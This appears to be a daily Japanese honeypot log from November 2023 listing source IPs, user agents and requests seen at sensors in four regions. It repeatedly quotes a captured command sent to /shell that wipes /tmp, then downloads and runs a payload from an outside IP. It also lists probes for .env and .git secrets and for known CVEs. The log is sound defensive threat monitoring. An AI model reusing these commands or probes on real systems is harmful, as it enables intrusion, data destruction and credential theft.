ハニーポット(仮) 観測記録 2023/11/05分です。
特徴
共通
GPONルータの脆弱性を狙うアクセス
CensysInspectによるスキャン行為
zgrabによるスキャン行為
/.envへのスキャン行為
Location:JP
/.gitへのスキャン行為
Gh0stRATのような動き
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 91.92.243.35/jaws; sh /tmp/jaws
Location:US
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 121.62.21.23/jaws; sh /tmp/jaws
cd /tmp; rm -rf *; wget 91.92.243.35/jaws; sh /tmp/jaws
Location:UK
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
.jsへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 91.92.243.35/jaws; sh /tmp/jaws
Location:SG
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
aiohttpによるスキャン行為
/.gitへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 91.92.243.35/jaws; sh /tmp/jaws
他
アクセス数推移
JP:総アクセス数:84 (前日比:-194)
US:総アクセス数:175 (前日比:37)
UK:総アクセス数:170 (前日比:37)
SG:総アクセス数:97 (前日比:-17)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
9 | 3.127.203.26 | United States |
3 | 20.40.103.45 | United States |
1 | 20.199.64.162 | United States |
1 | 23.95.122.102 | United States |
1 | 35.92.193.162 | United States |
15 | 43.154.141.71 | Singapore |
1 | 45.56.108.128 | United States |
1 | 45.95.168.217 | Croatia |
1 | 46.101.80.154 | United States |
1 | 52.56.157.102 | United States |
1 | 64.62.197.173 | United States |
2 | 64.62.197.174 | United States |
1 | 65.49.20.67 | United States |
1 | 66.240.205.34 | United States |
4 | 91.92.245.105 | Bulgaria |
2 | 95.158.32.112 | Ukraine |
3 | 104.192.0.50 | United States |
1 | 107.170.232.38 | United States |
8 | 135.125.217.54 | France |
7 | 135.125.244.48 | France |
1 | 167.94.138.126 | United States |
1 | 172.104.11.4 | United States |
4 | 185.142.236.43 | Seychelles |
1 | 185.180.143.190 | Portugal |
3 | 185.254.196.173 | Ukraine |
2 | 185.254.196.186 | Ukraine |
1 | 192.241.217.9 | United States |
1 | 197.36.180.145 | Egypt |
1 | 197.49.251.221 | Egypt |
1 | 197.55.225.206 | Egypt |
2 | 198.235.24.35 | United States |
2 | 198.235.24.223 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
23 | - |
3 | Go-http-client/1.1 |
1 | Hello, World |
3 | Hello, world |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 |
15 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.46 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 |
24 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/) |
1 | Mozilla/5.0 zgrab/0.x |
1 | Python-urllib/3.10 |
4 | python-requests/2.28.2 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | Gh0st\xad |
||
1 | MGLNDD_18.179.20.5_80\n |
||
1 | \x16\x03\x01\x01\xfa\x01 |
||
14 | \x16\x03\x01 |
||
1 | `` | ||
23 | GET | /.env |
HTTP/1.1 |
1 | GET | /.git/HEAD |
HTTP/1.1 |
4 | GET | /.git/config |
HTTP/1.1 |
1 | GET | /.well-known/security.txt |
HTTP/1.1 |
1 | GET | /194904995 |
HTTP/1.1 |
1 | GET | /_profiler/phpinfo |
HTTP/1.1 |
1 | GET | /cluster/list.query |
HTTP/1.1 |
4 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /geoserver/web/ |
HTTP/1.1 |
1 | GET | /login.html |
HTTP/1.1 |
1 | GET | /robots.txt |
HTTP/1.1 |
3 | GET | /shell?cd+/tmp;rm+-rf+*;wget+91[.]92[.]243[.]35/jaws;sh+/tmp/jaws |
HTTP/1.1 |
1 | GET | /sitemap.xml |
HTTP/1.1 |
1 | GET | /systembc/password.php |
HTTP/1.0 |
3 | GET | /v3/time |
HTTP/1.1 |
1 | GET | /web?id=NBjZjyqR |
HTTP/1.1 |
1 | GET | /webui/ |
HTTP/1.1 |
1 | GET | /yuuki?pp=env |
HTTP/1.1 |
15 | HEAD | /Core/Skin/Login.aspx |
HTTP/1.1 |
1 | POST | /GponForm/diag_Form?images/ |
HTTP/1.1 |
Location:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
24 | 3.223.72.184 | United States |
1 | 18.170.79.194 | United States |
8 | 44.208.85.154 | United States |
3 | 45.33.80.243 | United States |
1 | 45.79.181.223 | United States |
1 | 45.142.182.101 | Germany |
3 | 54.37.79.75 | France |
12 | 54.243.246.120 | United States |
28 | 57.129.23.166 | France |
1 | 65.49.1.24 | United States |
2 | 65.49.1.46 | United States |
1 | 65.49.1.47 | United States |
1 | 65.52.115.161 | United States |
1 | 68.69.185.50 | United States |
2 | 83.97.73.87 | Germany |
18 | 90.151.171.106 | Russia |
8 | 90.151.171.108 | Russia |
4 | 94.102.49.193 | United Kingdom |
3 | 94.156.66.33 | Bulgaria |
1 | 107.170.241.19 | United States |
1 | 139.59.101.104 | Singapore |
1 | 156.201.238.243 | Egypt |
2 | 162.142.125.212 | United States |
1 | 172.104.11.4 | United States |
1 | 172.104.11.34 | United States |
2 | 172.104.11.46 | United States |
1 | 172.104.11.51 | United States |
1 | 188.166.174.18 | United States |
1 | 192.155.90.118 | United States |
1 | 192.241.226.26 | United States |
1 | 193.35.18.187 | Bulgaria |
1 | 197.55.162.12 | Egypt |
2 | 198.235.24.143 | United States |
2 | 205.210.31.208 | United States |
33 | 205.234.144.37 | United States |
1 | 218.55.66.14 | South Korea |
UserAgent一覧
件数 | UserAgent |
---|---|
57 | - |
1 | Go-http-client/1.1 |
3 | Hello, world |
1 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.41 |
2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
33 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36 |
13 | Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0 (+https[:]//best-proxies.ru/faq/#from) Z73802194750Q1 |
13 | Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0 (+https[:]//best-proxies.ru/faq/#from) |
31 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
3 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
1 | Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/) |
1 | Mozilla/5.0 zgrab/0.x |
12 | Mozilla/5.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - |
||
1 | MGLNDD_34.68.118.83_80\n |
||
11 | \x16\x03\x01\x01\x07\x01 |
||
1 | \x16\x03\x01\x01\xfb\x01 |
||
36 | \x16\x03\x01 |
||
1 | `` | ||
2 | CONNECT | check.best-proxies[.]ru:443 |
HTTP/1.1 |
1 | CONNECT | checkip[.]amazonaws[.]com:443 |
HTTP/1.1 |
2 | CONNECT | eth0[.]me:443 |
HTTP/1.1 |
1 | CONNECT | fingerprints[.]bablosoft[.]com:443 |
HTTP/1.1 |
1 | CONNECT | google[.]com:443 |
HTTP/1.1 |
2 | CONNECT | ip[.]bablosoft[.]com:443 |
HTTP/1.1 |
5 | CONNECT | v4[.]ident[.]me:443 |
HTTP/1.1 |
2 | GET | ../../proc/ HTTP |
|
33 | GET | /.env |
HTTP/1.1 |
1 | GET | /.well-known/security.txt |
HTTP/1.1 |
1 | GET | /83.118.68.34.bc.googleusercontent.com/.env |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
1 | GET | /admin/.env |
HTTP/1.1 |
1 | GET | /api/.env |
HTTP/1.1 |
1 | GET | /app/.env |
HTTP/1.1 |
1 | GET | /app/config/.env |
HTTP/1.1 |
1 | GET | /apps/.env |
HTTP/1.1 |
1 | GET | /audio/.env |
HTTP/1.1 |
1 | GET | /backend/.env |
HTTP/1.1 |
1 | GET | /base/.env |
HTTP/1.1 |
1 | GET | /blog/.env |
HTTP/1.1 |
12 | GET | /cdn-cgi/trace |
HTTP/1.1 |
1 | GET | /cgi-bin/.env |
HTTP/1.1 |
1 | GET | /conf/.env |
HTTP/1.1 |
1 | GET | /core/.env |
HTTP/1.1 |
1 | GET | /crm/.env |
HTTP/1.1 |
1 | GET | /database/.env |
HTTP/1.1 |
3 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /geoserver/web/ |
HTTP/1.1 |
1 | GET | /laravel/.env |
HTTP/1.1 |
1 | GET | /library/.env |
HTTP/1.1 |
1 | GET | /local/.env |
HTTP/1.1 |
1 | GET | /login.html |
HTTP/1.1 |
1 | GET | /new/.env |
HTTP/1.1 |
1 | GET | /newsite/.env |
HTTP/1.1 |
1 | GET | /old/.env |
HTTP/1.1 |
1 | GET | /protected/.env |
HTTP/1.1 |
1 | GET | /public/.env |
HTTP/1.1 |
1 | GET | /robots.txt |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+121[.]62[.]21[.]23/jaws;sh+/tmp/jaws |
HTTP/1.1 |
2 | GET | /shell?cd+/tmp;rm+-rf+*;wget+91[.]92[.]243[.]35/jaws;sh+/tmp/jaws |
HTTP/1.1 |
1 | GET | /sitemap.xml |
HTTP/1.1 |
1 | GET | /sites/all/libraries/mailchimp/.env |
HTTP/1.1 |
1 | GET | /src/.env |
HTTP/1.1 |
1 | GET | /storage/.env |
HTTP/1.1 |
1 | GET | /vendor/.env |
HTTP/1.1 |
1 | GET | /vendor/laravel/.env |
HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | GET | /webui/ |
HTTP/1.1 |
1 | GET | /wp-admin/.env |
HTTP/1.1 |
1 | GET | /wp-content/.env |
HTTP/1.1 |
1 | GET | /www/.env |
HTTP/1.1 |
2 | GET | http[:]//check[.]best-proxies.ru/ip.php?Z73802194750Q1 |
HTTP/1.1 |
1 | GET | http[:]//checkip[.]amazonaws[.]com?Z73802194750Q1 |
HTTP/1.1 |
2 | GET | http[:]//eth0[.]me?Z73802194750Q1 |
HTTP/1.1 |
1 | GET | http[:]//fingerprints[.]bablosoft[.]com/ip?Z73802194750Q1 |
HTTP/1.1 |
2 | GET | http[:]//ip[.]bablosoft[.]com/?Z73802194750Q1 |
HTTP/1.1 |
5 | GET | http[:]//v4[.]ident[.]me?Z73802194750Q1 |
HTTP/1.1 |
3 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | PRI | * |
HTTP/2.0 |
Location:UK
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
33 | 5.161.75.43 | Germany |
71 | 13.40.150.72 | United States |
1 | 41.36.133.161 | Egypt |
8 | 44.210.133.4 | United States |
2 | 45.79.128.205 | United States |
1 | 45.79.172.21 | United States |
1 | 45.79.181.104 | United States |
2 | 45.79.181.251 | United States |
1 | 45.95.146.97 | Netherlands |
1 | 51.89.111.5 | France |
3 | 54.36.115.221 | France |
7 | 54.37.79.75 | France |
2 | 69.162.243.124 | United States |
2 | 78.153.140.221 | Russia |
1 | 80.82.78.39 | United Kingdom |
2 | 83.97.73.87 | Germany |
3 | 94.156.66.33 | Bulgaria |
2 | 109.107.183.51 | Russia |
1 | 139.59.101.104 | Singapore |
1 | 143.110.174.69 | United States |
2 | 167.94.138.126 | United States |
2 | 167.94.145.52 | United States |
2 | 172.104.11.46 | United States |
1 | 172.104.11.51 | United States |
2 | 172.105.128.11 | United States |
1 | 179.60.147.13 | Belize |
1 | 184.105.139.67 | United States |
3 | 184.105.139.69 | United States |
1 | 185.247.224.173 | Seychelles |
1 | 192.99.9.171 | Canada |
1 | 192.155.90.118 | United States |
1 | 192.241.203.5 | United States |
1 | 192.241.207.46 | United States |
1 | 197.55.78.35 | Egypt |
2 | 205.210.31.68 | United States |
2 | 205.210.31.142 | United States |
1 | 209.201.15.190 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
34 | 'Cloud mapping experiment. Contact research@pdrlabs.net' |
65 | - |
2 | Hello, world |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 OPR/95.0.0.0 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.46 |
6 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
33 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36 |
1 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 |
14 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
4 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
2 | Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/) |
1 | Mozilla/5.0 zgrab/0.x |
2 | Mozilla/5.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
2 | - |
||
1 | MGLNDD_132.145.66.34_80\n |
||
3 | \x03 |
||
1 | \x16\x03\x01\x01H\x01 |
||
1 | \x16\x03\x01\x01\xfc\x01 |
||
54 | \x16\x03\x01 |
||
1 | `` | ||
1 | GET | /+CSCOE+/logon.html |
HTTP/1.1 |
1 | GET | /.env.bak |
HTTP/1.1 |
13 | GET | /.env |
HTTP/1.1 |
1 | GET | /132.145.66.34/.env |
HTTP/1.1 |
1 | GET | /2.0/gui/ |
HTTP/1.1 |
1 | GET | /99vt |
HTTP/1.1 |
1 | GET | /99vu |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /Login.html |
HTTP/1.1 |
2 | GET | /NPClient.html |
HTTP/1.1 |
1 | GET | /WebViewer.html |
HTTP/1.1 |
1 | GET | /aaaaaaaaaaaaaaaaaaaaaaaaaqr |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
1 | GET | /admin/.env |
HTTP/1.1 |
1 | GET | /admin/index.html |
HTTP/1.1 |
1 | GET | /api/.env |
HTTP/1.1 |
1 | GET | /api/v1/charts |
HTTP/1.1 |
1 | GET | /app/.env |
HTTP/1.1 |
1 | GET | /app/config/.env |
HTTP/1.1 |
1 | GET | /apps/.env |
HTTP/1.1 |
1 | GET | /apps |
HTTP/1.1 |
1 | GET | /audio/.env |
HTTP/1.1 |
1 | GET | /backend/.env |
HTTP/1.1 |
1 | GET | /base/.env |
HTTP/1.1 |
1 | GET | /blog/.env |
HTTP/1.1 |
2 | GET | /cdn-cgi/trace |
HTTP/1.1 |
1 | GET | /cgi-bin/.env |
HTTP/1.1 |
1 | GET | /cgi-bin/login.cgi |
HTTP/1.1 |
1 | GET | /conf/.env |
HTTP/1.1 |
1 | GET | /core/.env |
HTTP/1.1 |
1 | GET | /crm/.env |
HTTP/1.1 |
1 | GET | /database/.env |
HTTP/1.1 |
1 | GET | /doc/page/login.asp |
HTTP/1.1 |
1 | GET | /doc/script/lib/seajs/config/sea-config.js |
HTTP/1.1 |
5 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /gate.php |
HTTP/1.1 |
1 | GET | /geoserver/web/ |
HTTP/1.1 |
1 | GET | /global-protect/login.esp |
HTTP/1.1 |
1 | GET | /index.asp |
HTTP/1.1 |
1 | GET | /index.html |
HTTP/1.1 |
2 | GET | /laravel/.env |
HTTP/1.1 |
1 | GET | /library/.env |
HTTP/1.1 |
1 | GET | /local/.env |
HTTP/1.1 |
1 | GET | /login.cs |
HTTP/1.1 |
2 | GET | /login.html |
HTTP/1.1 |
1 | GET | /login.rsp |
HTTP/1.1 |
1 | GET | /login/?next=/ |
HTTP/1.1 |
1 | GET | /login |
HTTP/1.1 |
1 | GET | /manage/account/login |
HTTP/1.1 |
1 | GET | /mm/ |
HTTP/1.1 |
1 | GET | /new/.env |
HTTP/1.1 |
1 | GET | /newsite/.env |
HTTP/1.1 |
1 | GET | /node |
HTTP/1.1 |
1 | GET | /npclient.html |
HTTP/1.1 |
1 | GET | /old/.env |
HTTP/1.1 |
1 | GET | /portal |
HTTP/1.1 |
1 | GET | /protected/.env |
HTTP/1.1 |
1 | GET | /public/.env |
HTTP/1.1 |
2 | GET | /robots.txt |
HTTP/1.1 |
2 | GET | /shell?cd+/tmp;rm+-rf+*;wget+91[.]92[.]243[.]35/jaws;sh+/tmp/jaws |
HTTP/1.1 |
1 | GET | /sites/all/libraries/mailchimp/.env |
HTTP/1.1 |
1 | GET | /src/.env |
HTTP/1.1 |
1 | GET | /storage/.env |
HTTP/1.1 |
1 | GET | /tmui/login.jsp |
HTTP/1.1 |
1 | GET | /ui |
HTTP/1.1 |
1 | GET | /users/sign_in |
HTTP/1.1 |
1 | GET | /vendor/.env |
HTTP/1.1 |
1 | GET | /vendor/laravel/.env |
HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | GET | /video.html |
HTTP/1.1 |
1 | GET | /vpn/index.html |
HTTP/1.1 |
1 | GET | /web/index.html |
HTTP/1.1 |
1 | GET | /webconsole/webpages/login.jsp |
HTTP/1.1 |
1 | GET | /webui/ |
HTTP/1.1 |
1 | GET | /webui |
HTTP/1.1 |
1 | GET | /wp-admin/.env |
HTTP/1.1 |
1 | GET | /wp-content/.env |
HTTP/1.1 |
1 | GET | /www/.env |
HTTP/1.1 |
4 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | POST | /laravel |
HTTP/1.1 |
2 | PRI | * |
HTTP/2.0 |
Location:SG
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 3.70.131.13 | United States |
1 | 5.196.102.78 | France |
1 | 20.218.114.9 | United States |
1 | 35.178.184.84 | United States |
1 | 45.56.108.128 | United States |
1 | 45.79.128.205 | United States |
1 | 45.79.172.21 | United States |
1 | 45.79.181.104 | United States |
1 | 45.79.181.251 | United States |
1 | 45.95.146.97 | Netherlands |
7 | 54.36.115.221 | France |
2 | 54.37.79.75 | France |
33 | 57.129.23.166 | France |
1 | 65.49.1.112 | United States |
1 | 66.240.192.82 | United States |
2 | 78.153.140.221 | Russia |
1 | 80.82.78.39 | United Kingdom |
2 | 83.97.73.87 | Germany |
1 | 90.146.182.130 | Austria |
2 | 94.156.66.33 | Bulgaria |
1 | 95.158.32.112 | Ukraine |
1 | 104.140.148.114 | United States |
1 | 104.248.82.211 | United States |
1 | 104.248.89.125 | United States |
1 | 104.248.93.33 | United States |
1 | 104.248.93.96 | United States |
1 | 104.248.93.212 | United States |
2 | 109.107.183.51 | Russia |
1 | 144.126.194.128 | United States |
1 | 147.78.47.10 | Lebanon |
2 | 162.142.125.14 | United States |
2 | 162.142.125.214 | United States |
2 | 167.94.138.36 | United States |
2 | 167.94.145.59 | United States |
1 | 172.104.11.4 | United States |
1 | 172.104.11.46 | United States |
5 | 172.105.128.11 | United States |
1 | 172.105.128.13 | United States |
1 | 174.138.9.168 | United States |
1 | 179.60.147.13 | Belize |
1 | 192.241.201.16 | United States |
1 | 192.241.207.34 | United States |
2 | 198.235.24.24 | United States |
2 | 198.235.24.180 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
32 | - |
1 | Hello, world |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X x.y; rv:42.0) Gecko/20100101 Firefox/42.0 |
2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
49 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 |
3 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
4 | Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/) |
1 | Mozilla/5.0 (iPod; U; CPU iPhone OS 3_1_1 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Mobile/7C145 |
1 | Mozilla/5.0 zgrab/0.x |
1 | Python/3.11 aiohttp/3.8.4 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | MGLNDD_13.67.44.234_80 |
||
4 | \x03 |
||
1 | \x16\x03\x01\x01H\x01 |
||
1 | \x16\x03\x01\x01\xfb\x01 |
||
19 | \x16\x03\x01 |
||
1 | `` | ||
44 | GET | /.env |
HTTP/1.1 |
1 | GET | /.git/ |
HTTP/1.1 |
6 | GET | /.git/config |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
6 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /login.html |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+91[.]92[.]243[.]35/jaws;sh+/tmp/jaws |
HTTP/1.1 |
1 | GET | /systembc/password.php |
HTTP/1.0 |
1 | GET | /web?id=NBjZjyqR |
HTTP/1.1 |
3 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
4 | PRI | * |
HTTP/2.0 |